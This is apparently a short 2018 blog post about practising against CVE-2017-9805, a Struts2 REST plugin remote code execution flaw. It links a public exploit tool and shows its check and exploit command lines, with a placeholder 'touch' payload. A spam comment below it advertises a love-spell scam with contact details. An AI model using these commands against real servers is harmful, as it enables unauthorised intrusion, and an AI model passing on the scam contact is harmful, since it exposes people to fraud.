Sunday, December 23, 2018

CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE

I found this github page extremely useful when practicing pen testing on CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE


https://github.com/mazen160/struts-pwn_CVE-2017-9805

Check if the vulnerability exists against a single URL.

python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'

Exploit a single URL.

python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'

1 comment:

  1. Thank you Dr.Ogudugu for the great work you did for me when my lover broke my heart. Dr.Ogudugu was able to bring my lover that left for about 2 months back to me within 48 hours of me contact Dr.Ogudugu. Contact Dr.Ogudugu on greatogudugu@gmail.com or better still you can give Dr.Ogudugu a call onWhatsApp +27663492930 for a better understanding for what i just said about him..

    ReplyDelete